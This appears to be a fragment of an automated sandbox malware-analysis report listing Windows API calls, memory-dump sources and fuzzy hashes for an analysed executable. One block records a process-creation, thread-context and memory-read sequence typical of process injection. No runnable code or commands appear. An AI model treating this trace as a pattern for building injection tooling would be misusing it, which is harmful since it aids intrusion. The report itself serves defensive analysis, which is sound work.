                                                                                                                                                                                                                                                      • API String ID: 928536360-0
APIs
• __FF_MSGBANNER.LIBCMT ref: 00EE3973
  • Part of subcall function 00EE81C2: __NMSG_WRITE.LIBCMT ref: 00EE81E9
  • Part of subcall function 00EE81C2: __NMSG_WRITE.LIBCMT ref: 00EE81F3
• __NMSG_WRITE.LIBCMT ref: 00EE397A
  • Part of subcall function 00EE821F: GetModuleFileNameW.KERNEL32(00000000,00F80312,00000104,00000000,00000001,00000000), ref: 00EE82B1
  • Part of subcall function 00EE821F: ___crtMessageBoxW.LIBCMT ref: 00EE835F
  • Part of subcall function 00EE1145: ___crtCorExitProcess.LIBCMT ref: 00EE114B
  • Part of subcall function 00EE1145: ExitProcess.KERNEL32 ref: 00EE1154
  • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
• RtlAllocateHeap.NTDLL(01120000,00000000,00000001,00000001,00000000,?,?,00EDF507,?,0000000E), ref: 00EE399F
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F0C385,?,?,?,?,?,00000004), ref: 00F0C6F2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F0C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F0C708
• CloseHandle.KERNEL32(00000000,?,00F0C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F0C70F
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 00F0BB72
  • Part of subcall function 00EE1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE7A85), ref: 00EE1CB1
  • Part of subcall function 00EE1C9D: GetLastError.KERNEL32(00000000,?,00EE7A85), ref: 00EE1CC3
• _free.LIBCMT ref: 00F0BB83
• _free.LIBCMT ref: 00F0BB95
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
  • Part of subcall function 00EC22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EC24F1), ref: 00EC2303
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EC25A1
• CoInitialize.OLE32(00000000), ref: 00EC2618
• CloseHandle.KERNEL32(00000000), ref: 00F3503A
Similarity
• API ID: Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 3815369404-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: __fread_nolock
• String ID: EA06
• API String ID: 2638373210-3962188686
• Opcode ID: 45d8c6d38ed535fc2d7bdd717c54c6a1951992631d21b840611b0db0f67fb5b5
• Instruction ID: c834ccc5363ae176f1ed30c0b245d22b83cf92f6317db645642ca1aa423609ba
• Opcode Fuzzy Hash: 45d8c6d38ed535fc2d7bdd717c54c6a1951992631d21b840611b0db0f67fb5b5
• Instruction Fuzzy Hash: 9B01B9729042587EDB18C7A9CC56FEDBBF8DB15301F00455AF553E62C1D574E7049B60
APIs
• __wsplitpath.LIBCMT ref: 00F0FEDD
• GetLastError.KERNEL32(00000002,00000000), ref: 00F0FF96
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ErrorLast__wsplitpath
• String ID:
• API String ID: 2679896820-0
• Opcode ID: 59a67ef41ad23059d72b360051cb5f2e6e7c0eae4435b2a433dbde0e582b4218
• Instruction ID: f1ba4291d5c8b22baefdab76b277e6cb12a8e93210f8b77f597ef8f32dc9b6ef
• Opcode Fuzzy Hash: 59a67ef41ad23059d72b360051cb5f2e6e7c0eae4435b2a433dbde0e582b4218
• Instruction Fuzzy Hash: B15183356043019FC724EF54C991FAEB3E5AF89320F04456DF95A9B3D2CB31A84AEB51
APIs
• IsThemeActive.UXTHEME ref: 00EC3A73
  • Part of subcall function 00EE1405: __lock.LIBCMT ref: 00EE140B
  • Part of subcall function 00EC3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EC3AF3
  • Part of subcall function 00EC3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EC3B08
  • Part of subcall function 00EC3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00EC3AA3,?), ref: 00EC3D45
  • Part of subcall function 00EC3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00EC3AA3,?), ref: 00EC3D57
  • Part of subcall function 00EC3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F81148,00F81130,?,?,?,?,00EC3AA3,?), ref: 00EC3DC8
  • Part of subcall function 00EC3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00EC3AA3,?), ref: 00EC3E48
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EC3AB3
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
• String ID:
• API String ID: 924797094-0
• Opcode ID: 2fc240ca7b217e7ccf17e53fb60a62579baf69b7ecd48a87ea56409baac13035
• Instruction ID: 043ba75ad0ebbba181716cbea487b85dc6d714344a0f597cf3c306aa497fed16
• Opcode Fuzzy Hash: 2fc240ca7b217e7ccf17e53fb60a62579baf69b7ecd48a87ea56409baac13035
• Instruction Fuzzy Hash: F011C0719043489BC310EF25ED05A6AFBE8FF94710F008A1FF985972A1DB709982DB92
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00EC4582,?,?,?,?,00EC2E1A), ref: 00EC482D
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00EC4582,?,?,?,?,00EC2E1A), ref: 00F34089
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 73933b57e56f4119be556167f338fa907bb7eb050b0a3721d68608e28bffd1c2
• Instruction ID: 2cba9f8945ba9619a24d54ecc51423babd4dd4585f1fc762af84bd4c8682a50c
• Opcode Fuzzy Hash: 73933b57e56f4119be556167f338fa907bb7eb050b0a3721d68608e28bffd1c2
• Instruction Fuzzy Hash: 640184B5244348BEF3240E14CD9AF6536DCEB1177CF108318BAE56A1E0C6B61C45DB50
APIs
• ___lock_fhandle.LIBCMT ref: 00EEEA29
• __close_nolock.LIBCMT ref: 00EEEA42
  • Part of subcall function 00EE7BDA: __getptd_noexit.LIBCMT ref: 00EE7BDA
  • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1046115767-0
                                                                                                                                                                                                                                                      • Opcode ID: af2ce6d7d1b5c725e6cefc739edd928e2d527ddfd6e9ed26f5a6a362b3e95e28
                                                                                                                                                                                                                                                      • Instruction ID: 399e6f864d71bb3bf3a02b06a67ce1ba249b1360d51192d513e941608243bbe5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af2ce6d7d1b5c725e6cefc739edd928e2d527ddfd6e9ed26f5a6a362b3e95e28
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1911E972805ADC8AD711BF66D8413997AE16F81331F266354E4687F3E3DBB48C00D7A5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EE395C: __FF_MSGBANNER.LIBCMT ref: 00EE3973
                                                                                                                                                                                                                                                        • Part of subcall function 00EE395C: __NMSG_WRITE.LIBCMT ref: 00EE397A
                                                                                                                                                                                                                                                        • Part of subcall function 00EE395C: RtlAllocateHeap.NTDLL(01120000,00000000,00000001,00000001,00000000,?,?,00EDF507,?,0000000E), ref: 00EE399F
                                                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00EDF51E
                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00EDF533
                                                                                                                                                                                                                                                        • Part of subcall function 00EE6805: RaiseException.KERNEL32(?,?,0000000E,00F76A30,?,?,?,00EDF538,0000000E,00F76A30,?,00000001), ref: 00EE6856
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3902256705-0
                                                                                                                                                                                                                                                      • Opcode ID: 8d117a8809406be218778590c0b3884b47d558fccc3d4b591cfbc9d5c75236d1
                                                                                                                                                                                                                                                      • Instruction ID: bb3c2f81a27b598413066c2675d1f1c1abb05133daf4a6df1590e9fd94b59a9a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d117a8809406be218778590c0b3884b47d558fccc3d4b591cfbc9d5c75236d1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F0A43110425E67DB04FF99E8019DE7BE89F00354F605127F909F2382DBB0DA4296A5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __lock_file_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 26237723-0
                                                                                                                                                                                                                                                      • Opcode ID: bd51ced16677a0fdde689e622b62955a9b89d6cfcde8a4bc21625b1974f6b84e
                                                                                                                                                                                                                                                      • Instruction ID: cd377ad8067f894c4725fabe6a4066de067a8d9c03eb9ec3aa9ad00fdfde0a58
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd51ced16677a0fdde689e622b62955a9b89d6cfcde8a4bc21625b1974f6b84e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F01887180068DFBCF25AFB68C0649F7BA1AF80350F145119F414771E1D7718751DB95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00EE3629
                                                                                                                                                                                                                                                        • Part of subcall function 00EE4E1C: __lock.LIBCMT ref: 00EE4E3F
                                                                                                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 00EE3634
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2800547568-0
                                                                                                                                                                                                                                                      • Opcode ID: 1a1ce74ae25b9d275eacf23fb48578dc235c33cc059e996c529d1ddb19cc4ee1
                                                                                                                                                                                                                                                      • Instruction ID: 4eec53a5235cfb4c19fe898efc409cad80c2eb163889acde10d5ea671e44f7cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a1ce74ae25b9d275eacf23fb48578dc235c33cc059e996c529d1ddb19cc4ee1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABF02B7180068DAAD711BB77880A76E76E06F50334F259108E414FB2D2C77C87019B52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,00EDE581,00000010,?,00000010,?,00000000), ref: 00ECC1F4
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,00EDE581,00000010,?,00000010,?,00000000), ref: 00ECC224
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID:
• API String ID: 626452242-0
• Opcode ID: 453a3d67a43dd0b5bb9b790f45d16a6ab94fa2a1706c9b116cc3d4bc59d14baa
• Instruction ID: e3c7e0093a7526c514e1e63b425a60185b25992dce7e339684a785de1ed505c3
• Opcode Fuzzy Hash: 453a3d67a43dd0b5bb9b790f45d16a6ab94fa2a1706c9b116cc3d4bc59d14baa
• Instruction Fuzzy Hash: CC01A271200204BFEB14AB65DC46FBB7B5CEF96760F10802AFD09DE2A1DA62A8418660
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0116D28B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0116D321
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0116D343
Memory Dump Source
• Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116b000_file.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
• Instruction ID: 147cab9e1d926dab4e82e5b74889f970e79abb32456be181d4ca9e2c4d24eb3e
• Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
• Instruction Fuzzy Hash: 1812DE24E18658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4E91CF5A
APIs
• __flush.LIBCMT ref: 00EE2A0B
  • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: __flush__getptd_noexit
• String ID:
• API String ID: 4101623367-0
• Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
• Instruction ID: ff36d21d3de010af20db12a181e73da51e26694fbb90b659c1626c0c56dabf9c
• Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
• Instruction Fuzzy Hash: D141C77060078E9FDB2C8E6BC8805AE77BAAF84354B24A53DE559E7241DB71DD408740
APIs
• SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00EC4774
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 8bc769c64e8d56e97d945f9acafd59142287971bb0acf7b86f7f5ee7c1911e5a
• Instruction ID: 44470101377f557b406333b81774ea36749915a9706315077ab927017946a9bb
• Opcode Fuzzy Hash: 8bc769c64e8d56e97d945f9acafd59142287971bb0acf7b86f7f5ee7c1911e5a
• Instruction Fuzzy Hash: 70316EB1A00605AFCB08CF6CC594B9DB7B5FF49324F14861EE819A7740D772B961CB90
APIs
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: ab5809efef14d9ef25b5f982cbd02ea546140c47e45d623e93ecdc7632d7642e
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 7731E970A00105DBC718EF68C4889A9FBB6FF49344B6496A6E409EF355DB31EDC2CB90
APIs
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: da258e1292b997d9ea2e49587eced076044caa121b425e0dbdf7a6656d3dd668
• Instruction ID: 0363b1b80d716ebb6745ced6bb30ede468509f6631df050c6543740e10b4e630
• Opcode Fuzzy Hash: da258e1292b997d9ea2e49587eced076044caa121b425e0dbdf7a6656d3dd668
• Instruction Fuzzy Hash: 95416D705086418FDB24CF14C484B1ABBE1FF45318F19899DE9965B362C376EC46DF42
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: __getptd_noexit
• String ID:
                                                                                                                                                                                                                                                      • API String ID: 3074181302-0
                                                                                                                                                                                                                                                      • Opcode ID: 308be4b8ea1770a853ac0e2ab7ffd50b3bad4d55989f40569e92ca1003e216d3
                                                                                                                                                                                                                                                      • Instruction ID: 2a8271144437eebfb0ddf457180bd34bca715e4609a79e3c4797785d2464c784
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 308be4b8ea1770a853ac0e2ab7ffd50b3bad4d55989f40569e92ca1003e216d3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 322181728046CC8BD712BFB6CC453A976E15F41335F252640E4747B2F6DBB48D009BA5
